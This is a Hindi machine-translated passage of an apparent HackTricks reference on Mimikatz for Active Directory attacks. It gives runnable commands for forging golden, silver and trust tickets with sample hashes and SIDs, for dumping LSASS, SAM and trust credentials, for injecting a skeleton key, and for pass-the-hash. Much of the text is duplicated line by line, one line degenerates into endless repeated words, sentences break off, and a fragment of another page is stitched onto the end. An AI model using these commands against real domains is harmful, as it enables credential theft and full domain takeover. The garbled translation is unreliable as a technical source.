* /ptt - /ticket के विकल्प के रूप में - इसका उपयोग करें ताकि जाली टिकट को तत्काल उपयोग के लिए मेमोरी में इंजेक्ट किया जा सके।
* /id (वैकल्पिक) - उपयोगकर्ता RID। Mimikatz की डिफ़ॉल्ट मान्यांकन 500 है (डिफ़ॉल्ट प्रशासक खाता RID)।
* /startoffset (वैकल्पिक) - जब टिकट उपलब्ध होता है तो प्रारंभ ऑफ़सेट (सामान्यतः -10 या 0 सेट किया जाता है यदि यह विकल्प उपयोग किया जाता है)। Mimikatz की डिफ़ॉल्ट मान्यांकन 0 है।
* /endin (वैकल्पिक) - टिकट की आयु। Mimikatz की डिफ़ॉल्ट मान्यांकन 10 वर्ष (\~5,262,480 मिनट) है। Active Directory की डिफ़ॉल्ट केरबेरोस नीति सेटिंग 10 घंटे (600 मिनट) है।
* /renewmax (वैकल्पिक) - नवीनीकरण के साथ अधिकतम टिकट आयु। Mimikatz की डिफ़ॉल्ट मान्यांकन 10 वर्ष (\~5,262,480 मिनट) है। Active Directory की डिफ़ॉल्ट केरबेरोस नीति सेटिंग 7 दिन (10,080 मिनट) है।
* /sids (वैकल्पिक) - AD वन में Enterprise Admins समूह के SID (\[ADRootDomainSID]-519) को सेट करें ताकि AD वन में उच्चाधिकारिक अधिकारों को जाली बनाएं (AD वन में हर डोमेन में AD व्यवस्थापक)।
* /aes128 - AES128 कुंजी
* /aes256 - AES256 कुंजी
गोल्डन टिकट डिफ़ॉल्ट समूह:
* डोमेन उपयोगकर्ता SID: S-1-5-21\<DOMAINID>-513
* डोमेन व्यवस्थापक SID: S-1-5-21\<DOMAINID>-512
* स्कीमा व्यवस्थापक SID: S-1-5-21\<DOMAINID>-518
* एंटरप्राइज व्यवस्थापक SID: S-1-5-21\<DOMAINID>-519 (यह केवल तब प्रभावी होता है जब जाली टिकट वन रूट डोमेन में बनाया जाता है, हालांकि AD वन व्यवस्थापक अधिकारों के लिए /sids पैरामीटर का उपयोग करके जोड़ें)
* समूह नीति निर्माता मालिक SID: S-1-5-21\<DOMAINID>-520
* /domain पूरी तरह से योग्य डोमेन नाम। इस उदाहरण में: "lab.adsecurity.org"।
* /sid डोमेन का SID। इस उदाहरण में: "S-1-5-21-1473643419-774954089-2222329127"।
* /sids अधिक SIDs जो आप टिकट को धोखा देना चाहते हैं एडी वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन
```
.\mimikatz "kerberos::golden /User:Administrator /domain:rd.lab.adsecurity.org /id:512 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit
```
[डोमेन के बीच सोने के टिकट](https://adsecurity.org/?p=1640)
[डोमेन के लिए सोने के टिकट](https://adsecurity.org/?p=1640)
#### सिल्वर टिकट
एक सिल्वर टिकट एक TGS है (फॉर्मेट में TGT के समान) जिसमें लक्षित सेवा खाते का उपयोग करके (SPN मैपिंग द्वारा पहचाना जाता है) NTLM पासवर्ड हैश का उपयोग करके इसे एन्क्रिप्ट और साइन किया जाता है।
एक सिल्वर टिकट एक TGS (फॉर्मेट में TGT के समान) है जो लक्ष्य सेवा खाते का (SPN मैपिंग द्वारा पहचाना गया) NTLM पासवर्ड हैश का उपयोग करके एन्क्रिप्ट और साइन करता है।
**सिल्वर टिकट बनाने के लिए उदाहरण Mimikatz कमांड:**
**उदाहरण Mimikatz कमांड एक सिल्वर टिकट बनाने के लिए:**
निम्नलिखित Mimikatz कमांड एक सिल्वर टिकट बनाता है जो सर्वर adsmswin2k8r2.lab.adsecurity.org पर CIFS सेवा के लिए है। इस सिल्वर टिकट को सफलतापूर्वक बनाने के लिए, adsmswin2k8r2.lab.adsecurity.org के लिए AD कंप्यूटर खाता पासवर्ड हैश को खोजा जाना चाहिए, या तो AD डोमेन डंप से या ऊपर दिखाए गए लोकल सिस्टम पर Mimikatz चलाकर (_Mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit_)। NTLM पासवर्ड हैश को /rc4 पैरामीटर के साथ उपयोग किया जाता है। सेवा SPN प्रकार को /service पैरामीटर में पहचाना जाना चाहिए। अंत में, लक्षित कंप्यूटर का पूर्ण-योग्य डोमेन नाम /target पैरामीटर में प्रदान किया जाना चाहिए। /sid पैरामीटर में डोमेन SID को न भूलें।
निम्नलिखित Mimikatz कमांड एक सिल्वर टिकट बनाता है जो सर्वर adsmswin2k8r2.lab.adsecurity.org पर CIFS सेवा के लिए है। इस सिल्वर टिकट को सफलतापूर्वक बनाने के लिए, adsmswin2k8r2.lab.adsecurity.org के लिए AD कंप्यूटर खाता पासवर्ड हैश को खोजना होगा, या तो एडी डोमेन डंप से या ऊपर दिखाए गए स्थानीय सिस्टम पर Mimikatz चलाकर। NTLM पासवर्ड हैश का उपयोग /rc4 पैरामीटर के साथ किया जाता है। सेवा SPN प्रकार को /service पैरामीटर में पहचाना जाना चाहिए। अंततः, लक्ष्य कंप्यूटर का पूरी तरह से विस्तारित डोमेन नाम /target पैरामीटर में प्रदान किया जाना चाहिए। /sid पैरामीटर में डोमेन SID को न भूलें।
```
mimikatz “kerberos::golden /admin:LukeSkywalker /id:1106 /domain:lab.adsecurity.org /sid:S-1-5-21-1473643419-774954089-2222329127 /target:adsmswin2k8r2.lab.adsecurity.org /rc4:d7e2b80507ea074ad59f152a1ba20458 /service:cifs /ptt” exit
```
#### [**विश्वास टिकट**](https://adsecurity.org/?p=1588)
#### [**विश्वास पास**](https://adsecurity.org/?p=1588)
एक्टिव डायरेक्टरी ट्रस्ट पासवर्ड हैश निर्धारित होने के बाद, एक ट्रस्ट टिकट उत्पन्न किया जा सकता है। ट्रस्ट टिकट उन दोमेन के बीच साझा पासवर्ड का उपयोग करके बनाए जाते हैं जो एक-दूसरे पर विश्वास करते हैं।\
[ट्रस्ट टिकट पर अधिक पृष्ठभूमि।](https://adsecurity.org/?p=1588)
एक बार एक्टिव डायरेक्टरी ट्रस्ट पासवर्ड हैश निर्धारित हो जाता है, तो एक ट्रस्ट टिकट उत्पन्न किया जा सकता है। ट्रस्ट टिकट उन्हें उपयोग करके बनाए जाते हैं जो एक-दूसरे पर विश्वास करते हैं 2 डोमेन के बीच साझा पासवर्ड का उपयोग करके।\
[विश्वास पास पर अधिक जानकारी।](https://adsecurity.org/?p=1588)
**ट्रस्ट पासवर्ड (ट्रस्ट कुंजी) डंप करना**
```
Mimikatz “privilege::debug” “lsadump::trust /patch” exit
```
**Mimikatz का उपयोग करके एक जाली विश्वास प्रमाणपत्र (इंटर-वीटीजी) बनाएं**
**Mimikatz का उपयोग करके एक जाली विश्वास टिकट (इंटर-रील्म TGT) बनाएं**
Mimikatz का उपयोग करके विश्वास प्रमाणपत्र को जाली बनाएं जिसमें कहा जाता है कि प्रमाणपत्र धारक AD वनस्पति में एक एंटरप्राइज व्यवस्थापक है (Mimikatz में विश्वास प्रमाणपत्रों के बीच में सिडीइतिहास, "सिडीएस" का उपयोग करके विश्वास प्रमाणपत्रों के बीच यात्रा करने के लिए, यह मेरा "योगदान" है)। इससे एक बाल डोमेन से मूल डोमेन के पूर्ण प्रशासनिक पहुंच संभव होती है। ध्यान दें कि यह खाता कहीं भी मौजूद नहीं होना चाहिए क्योंकि यह वास्तव में एक सोने का प्रमाणपत्र है जो विश्वास प्रमाणपत्र के बीच यात्रा करता है।
विश्वास टिकट को जाली बनाएं जिसमें कहा गया है कि टिकट धारक AD वन्य (AD Forest) में एक एंटरप्राइज़ व्यवस्थापक है (SIDHistory, "sids" का लाभ उठाते हुए, Mimikatz में विश्वास करते हुए, मेरा "योगदान" Mimikatz में)। यह एक बच्चा डोमेन से माता-पिता डोमेन तक पूर्ण प्रशासनिक पहुंच सक्षम करता है। ध्यान दें कि यह खाता कहीं मौजूद नहीं होना चाहिए क्योंकि यह वास्तव में एक स्वर्ण टिकट है जो विश्वास पर है।
```
Mimikatz “Kerberos::golden /domain:child.lab.adsecurity.org /sid:S-1-5-21-3677078698-724690114-1972670770 /sids:S-1-5-21-1581655573-3923512380-696647894-519 /rc4:49ed1653275f78846ff06de1a02386fd /user:DarthVader /service:krbtgt /target:lab.adsecurity.org /ticket:c:\temp\tickets\EA-ADSECLABCHILD.kirbi” exit
```
विश्वास टिकट विशेष आवश्यक पैरामीटर:
### विश्वास टिकट विशेष आवश्यक पैरामीटर:
* \*\*/\*\*target - लक्षित डोमेन का FQDN।
* \*\*/\*\*service - लक्षित डोमेन में चल रही केरबेरोस सेवा (krbtgt)।
* \*\*/\*\*rc4 - सेवा केरबेरोस सेवा खाता (krbtgt) के लिए NTLM हैश।
* \*\*/\*\*ticket - बाद में उपयोग के लिए जाली टिकट फ़ाइल को सहेजने के लिए एक पथ और नाम प्रदान करें या /ptt का उपयोग करके स्मृति में स्वर्ण टिकट को तत्काल इंजेक्शन करें।
#### **और KERBEROS**
**KERBEROS::List** - उपयोगकर्ता मेमोरी में सभी उपयोगकर्ता टिकट (TGT और TGS) की सूची बनाएँ। कोई विशेष अधिकार आवश्यक नहीं है क्योंकि यह केवल वर्तमान उपयोगकर्ता के टिकट प्रदर्शित करता है।\
"क्लिस्ट" की कार्यान्वयनता के समान।
**KERBEROS::PTC** - कैश पास करें (NT6)\
Mac OS, Linux, BSD, Unix, आदि जैसे \*निक्स सिस्टम Kerberos क्रेडेंशियल कैश करते हैं। इस कैश डेटा को Mimikatz का उपयोग करके कॉपी किया जा सकता है। Kerberos टिकट्स को ccache फ़ाइल में इंजेक्शन करने के लिए भी उपयोगी है।
Mimikatz के kerberos::ptc का एक अच्छा उदाहरण है [PyKEK के साथ MS14-068 का शोषण](https://adsecurity.org/?p=676)। PyKEK एक ccache फ़ाइल उत्पन्न करता है जिसे kerberos::ptc का उपयोग करके Mimikatz में इंजेक्शन किया जा सकता है।
[![Mimikatz-PTC-PyKEK-ccacheFile](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-PTC-PyKEK-ccacheFile.jpg)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-PTC-PyKEK-ccacheFile.jpg)
**KERBEROS::PTT** - टिकट पास करें\
[Kerberos टिकट मिलने के बाद](https://adsecurity.org/?p=1667), इसे दूसरे सिस्टम में कॉपी किया जा सकता है और मौजूदा सत्र में पास किया जा सकता है, जिससे कोई संचार के बिना लॉगऑन की अनुकरण किया जा सकता है। कोई विशेष अधिकार आवश्यक नहीं है।\
SEKURLSA::PTH (पास-द-हैश) के समान।
* /filename - टिकट का फ़ाइलनाम (एकाधिक हो सकते हैं)
* /diretory - एक निर्देशिका पथ, जिसमें सभी .kirbi फ़ाइलें होंगी, इंजेक्शन किया जाएगा।
[![KerberosUnConstrainedDelegation-Mimikatz-PTT-LS-Ticket2](https://adsecurity.org/wp-content/uploads/2015/09/KerberosUnConstrainedDelegation-Mimikatz-PTT-LS-Ticket2.png)](https://adsecurity.org/wp-content/uploads/2015/09/KerberosUnConstrainedDelegation-Mimikatz-PTT-LS-Ticket2.png)
**KERBEROS::Purge** - सभी Kerberos टिकट हटाएं\
"क्लिस्ट पर्ज" की कार्यान्वयनता के समान। टिकट (PTC, PTT, आदि) को पास करने से पहले इस कमांड को चलाएं ताकि सही उपयोगकर्ता संदर्भ का उपयोग किया जा सके।
[![Mimikatz-Kerberos-Purge](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-Purge.png)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-Purge.png)
**KERBEROS::TGT** - वर्तमान उपयोगकर्ता के लिए वर्तमान TGT प्राप्त करें।
[![Mimikatz-Kerberos-TGT](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-TGT.png)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-TGT.png)
### LSADUMP
**LSADUMP**::**DCShadow** - वर्तमान मशीन को DC के रूप में सेट करें ताकि DC के भीतर नए ऑब्जेक्ट बनाने की क्षमता हो (स्थायी विधि)।\
इसके लिए पूर्ण AD व्यवस्थापक अधिकार या KRBTGT पासवर्ड हैश की आवश्यकता होती है।\
DCShadow सामयिक रूप से कंप्यूटर को प्रतिरूपण के उद्देश्य के लिए "DC" के रूप में सेट करता है:
* AD वनस्पति के वनस्पति में 2 ऑब्जेक्ट बनाएं।
* उपयोग किए जाने वाले कंप्यूटर के SPN में "GC" (ग्लोबल कैटलॉग) और "E3514235-4B06-11D1-AB04-00C04FC2DCD2" (AD रिप्लिकेशन) शामिल करें। [ADSecurity SPN अनुभाग](https://adsecurity.org/?page\_id=183) में Kerberos सेवा प्रमुख नामों पर अधिक जानकारी।
* DrsReplicaAdd और KCC के माध्यम से अद्यतनों को DCs को पुश करें।
* वनस्पति में बनाए गए ऑब्जेक्ट हटाएं।
**LSADUMP::DCSync** - एक DC से एक ऑब्जेक्ट को समकालिक करने के लिए DC से सिंक्रनाइज़ करें (खाता के
* \*\*/\*\*target लक्षित डोमेन का FQDN।
* \*\*/\*\*service लक्षित डोमेन में चल रही केरबेरोस सेवा (krbtgt)।
* \*\*/\*\*rc4 सेवा केरबेरोस स
```
mimikatz lsadump::lsa /inject exit
```
**LSADUMP::NetSync**
NetSync एक सरल तरीका प्रदान करता है जिसके माध्यम से एक डीसी कंप्यूटर खाता पासवर्ड डेटा का उपयोग करके एक डोमेन कंट्रोलर की भूमिका में छवि बनाने के लिए सिल्वर टिकट का उपयोग करके लक्षित खाता की जानकारी, सहित पासवर्ड डेटा, को डीसीसिंक करता है।
NetSync एक DC कंप्यूटर खाता पासवर्ड डेटा का उपयोग करने का एक सरल तरीका प्रदान करता है जिससे एक Silver Ticket के माध्यम से डोमेन कंट्रोलर का अनुकरण किया जा सकता है और टारगेट खाते की जानकारी जिसमें पासवर्ड डेटा शामिल है, DCSync किया जा सकता है।
**LSADUMP::SAM** - SAM प्रविष्टियों (रजिस्ट्री या हाइव से) को डिक्रिप्ट करने के लिए SysKey प्राप्त करें। SAM विकल्प स्थानीय सुरक्षा खाता प्रबंधक (SAM) डेटाबेस से कनेक्ट करता है और स्थानीय खातों के लिए क्रेडेंशियल्स को डंप करता है।
**LSADUMP::SAM** SAM प्रविष्टियों (रजिस्ट्री या हाइव से) को डिक्रिप्ट करने के लिए SysKey प्राप्त करें। SAM विकल्प स्थानीय सुरक्षा खाता प्रबंधक (SAM) डेटाबेस से कनेक्ट करता है और स्थानीय खातों के लिए क्रेडेंशियल को डंप करता है।
**LSADUMP::Secrets** - SysKey प्राप्त करें ताकि SECRETS प्रविष्टियों (रजिस्ट्री या हाइव से) को डिक्रिप्ट किया जा सके
**LSADUMP::Secrets** सीक्रेट्स प्रविष्टियों (रजिस्ट्री या हाइव से) को डिक्रिप्ट करने के लिए SysKey प्राप्त करें।
**LSADUMP::SetNTLM** - एक उपयोगकर्ता के लिए एक नया पासवर्ड/NTLM सेट करने के लिए सर्वर से अनुरोध करें।
**LSADUMP::SetNTLM** एक उपयोगकर्ता के लिए एक नया पासवर्ड/NTLM सेट करने के लिए सर्वर से अनुरोध करें।
[**LSADUMP::Trust**](https://adsecurity.org/?p=1588) - LSA सर्वर से विश्वास प्रमाणन जानकारी (सामान्य या फ्लाई पर पैच) प्राप्त करने के लिए LSA सर्वर से पूछें।
[**LSADUMP::Trust**](https://adsecurity.org/?p=1588) LSA सर्वर से विश्वास स्वीकृति जानकारी (सामान्य या पैच के साथ) प्राप्त करने के लिए अनुरोध करें।
### MISC
[**MISC::Skeleton**](https://adsecurity.org/?p=1275) - डोमेन कंट्रोलर पर LSASS प्रक्रिया में स्केलेटन कुंजी इंजेक्ट करें।
[**MISC::Skeleton**](https://adsecurity.org/?p=1275) डोमेन कंट्रोलर पर LSASS प्रक्रिया में स्केलेटन कुंजी इंजेक्ट करें।
```
"privilege::debug" "misc::skeleton"
```
### विशेषाधिकार
**PRIVILEGE::Backup** - बैकअप विशेषाधिकार प्राप्त करें। डीबग अधिकारों की आवश्यकता होती है।
**PRIVILEGE::Backup** - बैकअप विशेषाधिकार/अधिकार प्राप्त करें। Debug अधिकारों की आवश्यकता है।
**PRIVILEGE::Debug** - डीबग अधिकार प्राप्त करें (यह या स्थानिक सिस्टम अधिकारों की आवश्यकता होती है बहुत सारे Mimikatz कमांड के लिए)।
**PRIVILEGE::Debug** - Debug अधिकार प्राप्त करें (यह या स्थानीय सिस्टम अधिकारों की आवश्यकता होती है बहुत से Mimikatz कमांड्स के लिए)।
### SEKURLSA
**SEKURLSA::Credman** - क्रेडेंशियल प्रबंधक की सूची देखें
**SEKURLSA::Credman** - क्रेडेंशियल्स मैनेजर की सूची देखें।
**SEKURLSA::Ekeys** - **करबेरोस एन्क्रिप्शन कुंजी** की सूची देखें
**SEKURLSA::Ekeys** - **कर्बेरोस एन्क्रिप्शन कुंजियों** की सूची देखें।
**SEKURLSA::Kerberos** - सभी प्रमाणित उपयोगकर्ताओं (सेवाओं और कंप्यूटर खाता सहित) के लिए करबेरोस प्रमाणपत्रों की सूची देखें
**SEKURLSA::Kerberos** - सभी प्रमाणित उपयोगकर्ताओं के लिए कर्बेरोस प्रमाणपत्रों की सूची देखें (सेवाएं और कंप्यूटर खाता सहित)।
**SEKURLSA::Krbtgt** - डोमेन करबेरोस सेवा खाता (KRBTGT) पासवर्ड डेटा प्राप्त करें
**SEKURLSA::Krbtgt** - डोमेन कर्बेरोस सेवा खाता (KRBTGT) पासवर्ड डेटा प्राप्त करें।
**SEKURLSA::SSP** - SSP प्रमाणपत्रों की सूची देखे
**SEKURLSA::SSP** - SSP प्रमाणपत्रों की सूची दें।
**SEKURLSA::Wdigest** - WDigest प्रमाणपत्रों की सूची देखे
**SEKURLSA::Wdigest** - WDigest प्रमाणपत्रों की सूची दें।
**SEKURLSA::LogonPasswords** - सभी उपलब्ध प्रदाता प्रमाणपत्रों की सूची देखें। यह आमतौर पर हाल ही में लॉग इन किए गए उपयोगकर्ता और कंप्यूटर प्रमाणपत्रों को दिखाता है।
**SEKURLSA::LogonPasswords** - सभी उपलब्ध प्रदाता प्रमाणपत्रों की सूची देता है। यह आम तौर पर हाल ही में लॉग इन करने वाले उपयोगकर्ता और कंप्यूटर प्रमाणपत्रों को दिखाता है।
* वर्तमान में लॉग इन किए गए (या हाल ही में लॉग इन किए गए) खातों के लिए LSASS में पासवर्ड डेटा डंप करता है, साथ ही उपयोगकर्ता प्रमाणों के संदर्भ में चल रही सेवाएं भी शामिल होती हैं।
* खाता पासवर्ड को प्रतिबिंबी तरीके से मेमोरी में संग्रहीत किया जाता है। यदि वे मेमोरी में हैं (Windows 8.1/Windows Server 2012 R2 से पहले थे), तो वे प्रदर्शित किए जाते हैं। Windows 8.1/Windows Server 2012 R2 आमतौर पर अधिकांश मामलों में खाता पासवर्ड को इस तरीके से संग्रहीत नहीं करता है। KB2871997 इस सुरक्षा क्षमता को Windows 7, Windows 8, Windows Server 2008R2 और Windows Server 2012 में लागू करता है, हालांकि KB2871997 लागू करने के बाद कंप्यूटर को अतिरिक्त कॉन्फ़िगरेशन की आवश्यकता होती है।
* व्यवस्थापक पहुंच (डीबग अधिकारों के साथ) या स्थानिक सिस्टम अधिकारों की आवश्यकता होती ह
* वर्तमान में लॉग इन किए गए (या हाल ही में लॉग इन किए गए) खातों के लिए LSASS में पासवर्ड डेटा डंप करता है, साथ ही उपयोगकर्ता प्रमाणपत्रों के संदर्भ में उपयोगकर्ता प्रमाणपत्रों के संदर्भ में चल रही सेवाएं।
* खाता पासवर्ड को एक पलटवार तरीके में मेमोरी में संग्रहित किया जाता है। यदि वे मेमोरी में हैं (Windows 8.1/Windows Server 2012 R2 से पहले थे), तो वे प्रदर्शित किए जाते हैं। Windows 8.1/Windows Server 2012 R2 अधिकांश मामलों में खाता पासवर्ड को इस तरह से संग्रहित नहीं करता है। KB2871997 "बैक-पोर्ट्स" इस सुरक्षा क्षमता को Windows 7, Windows 8, Windows Server 2008R2, और Windows Server 2012 में लागू करने के बाद, कंप्यूटर को अतिरिक्त विन्यास की आवश्यकता होती है।
* प्रशासक एक्सेस (डीबग अधिकारों के साथ) या स्थानीय सिस्टम अधिकारों की आवश्यकता है
**SEKURLSA::Minidump** - LSASS मिनीडंप प्रक्रिया संदर्भ में स्विच करें (lsass डंप पढ़ें)
**SEKURLSA::Minidump** - LSASS मिनीडंप प्रक्रिया संदर्भ में स्विच करें (lsass डंप पढ़ें)
**SEKURLSA::Pth** - पास-द-हैश और ओवर-पास-द-हैश (अर्थात पासवर्ड की कुंजी पास करें)।
**SEKURLSA::Pth** - पास-द-हैश और ओवर-पास-द-हैश (जिसे पास द की कुंजी कहा जाता है)।
_Mimikatz प्रसिद्ध आपरेशन 'पास-द-हैश' को करने के लिए कार्य कर सकता है, जिसमें उपयोगकर्ता के पासवर्ड के NTLM हैश के साथ दूसरे प्रमाणों के तहत प्रक्रिया चलाई जाती है, इसके बजाय असली पासवर्ड। इसके लिए, यह एक नकली पहचान के साथ एक प्रक्रिया शुरू करता है, फिर नकली जानकारी (नकली पासवर्ड के NTLM हैश) को असली जानकारी (असली पासवर्ड के NTLM हैश) के साथ बदलता है।_
_Mimikatz एक प्रक्रिया को दौर अन्य प्रमाणों के तहत चलाने के लिए 'पास-द-हैश' नामक विख्यात ऑपरेशन को कर सकता है जिसमें उपयोगकर्ता के पासवर्ड के NTLM हैश के साथ एक प्रक्रिया चलाता है, इसके असली पासवर्ड के बजाय। इसके लिए, यह एक प्रक्रिया एक नकली पहचान के साथ शुरू करता है, फिर नकली जानकारी (नकली पासवर्ड का NTLM हैश) को असली जानकारी (वास्तविक पासवर्ड का NTLM हैश) से बदलता है।_
* /user - आप जिस उपयोगकर्ता की प्रतिष्ठा करना चाहते हैं, ध्यान दें कि विशेष रूप से इस प्रसिद्ध खाते के लिए व्यवस्थापक नाम नहीं है।
* /domain - पूर्ण नामित डोमेन नाम - डोमेन के बिना या स्थानिक उपयोगकर्ता/व्यवस्थापक के मामले में, कंप्यूटर या सर्वर नाम, कार्यसमूह या कुछ भी उपयोग करें।
* /user - आप जिस उपयोगकर्ता का अनुकरण करना चाहते हैं, ध्यान रखें कि व्यवस्थापक इस प्रसिद्ध खाते के लिए एकमात्र नाम नहीं है।
* /domain - पूरी तरह से योग्य डोमेन नाम - डोमेन के बिना या स्थानीय उपयोगकर्ता/व्यवस्थापक के मामले में, कंप्यूटर या सर्वर नाम, कार्यसमूह या कुछ भी उपयोग करें।
* /rc4 या /ntlm - वैकल्पिक - उपयोगकर्ता के पासवर्ड की RC4 कुंजी / NTLM हैश।
* /run - वैकल्पिक - चलाने के लिए कमांड लाइन - डिफ़ॉल्ट है: शेल के लिए cmd।
* /run - वैकल्पिक - रन करने के लिए कमांड लाइन - डिफ़ॉल्ट है: एक शैल रखने के लिए cmd।
[![Mimikatz-Sekurlsa-PTH](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-PTH.jpg)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-PTH.jpg)
**SEKURLSA::Tickets** - हाल ही में प्रमाणित उपयोगकर्ताओं के लिए सभी उपलब्ध केरबेरोस टिकट देखें, जिनमें उपयोगकर्ता खाता और स्थानीय कंप्यूटर के AD कंप्यूटर खाता के संदर्भ में सेवाएं चल रही होती हैं।\
केरबेर
### वॉल्ट
**SEKURLSA::Tickets** - हाल ही में प्रमाणित किए गए सभी उपयोगकर्ताओं के लिए सभी उपलब्ध कर्बेरोस टिकटों की सूची देता है, जिसमें उपयोगकर्ता खाता और स्थानीय कंप्यूटर का AD कंप्यूटर खाता सहित सेवाएं उपयोगकर्ता खाते के संदर्भ में चल रही होती हैं।
`mimikatz.exe "privilege::debug" "token::elevate" "vault::cred /patch" "exit"` - निर्धारित कार्यों के पासवर्ड प्राप्त करें
* /export - वैकल्पिक - टिकट .kirbi फ़ाइलों में निर्यात किए जाते हैं। वे उपयोगकर्ता के LUID और समूह संख्या से शुरू होते हैं (0 = TGS, 1 = क्लाइंट टिकट(?) और 2 = TGT)
\
\
\\
LSASS से क्रेडेंशियल डंपिंग के समान, सेकुरल्सा मॉड्यूल का उपयोग करके, एक हमलावर एक सिस्टम पर मेमोरी में सभी कर्बेरोस टिकट डेटा प्राप्त कर सकता है, जिसमें एक व्यवस्थापक या सेवा के टिकट शामिल हैं।
यह अत्यंत उपयोगी है अगर एक हमलावर ने एक वेब सर्वर को हाक कर लिया है जिसे कर्बेरोस अनुवहन के लिए कॉन्फ़िगर किया गया है जिसे उपयोगकर्ता एक बैकएंड SQL सर्वर के साथ एक्सेस करते हैं। इससे एक हमलावर को उस सर्वर पर मेमोरी में सभी उपयोगकर्ता टिकट को कैप्चर और पुनः उपयोग करने की संभावना होती है।
<details>
"kerberos::tickets" mimikatz कमांड वर्तमान में लॉग इन किए गए उपयोगकर्ता के कर्बेरोस टिकट डंप करता है और उच्च अधिकारों की आवश्यकता नहीं है। सुरक्षित मेमोरी से पढ़ने की क्षमता का लाभ उठाते हुए, सिस्टम पर सभी कर्बेरोस टिकट डंप किए जा सकते हैं।
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
कमांड: _mimikatz sekurlsa::tickets exit_
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने की अनुमति** चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एकल [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह देखें
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें,** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **में PR जमा करके।**
* सिस्टम पर सभी प्रमाणित कर्बेरोस टिकट डंप करता है।
* प्रशासक एक्सेस (डीबग के साथ) या स्थानीय सिस्टम अधिकारों की आवश्यकता है।
</details>
### **SID**
Mimikatz SID मॉड्यूल MISC::AddSID को बदलता है। Ntds सेवा को पैच करने के लिए SID::Patch का उपयोग करें।
**SID::add** - एक ऑब्जेक्ट के SIDHistory में एक SID जोड़ें।
[![Mimikatz-SID-add](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-add.png)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-add.png)
**SID::modify** - एक ऑब्ज

File diff suppressed because one or more lines are too long

View file

@ -1,22 +1,22 @@
# पहुंच टोकन
# एक्सेस टोकन्स
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family)
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें**.
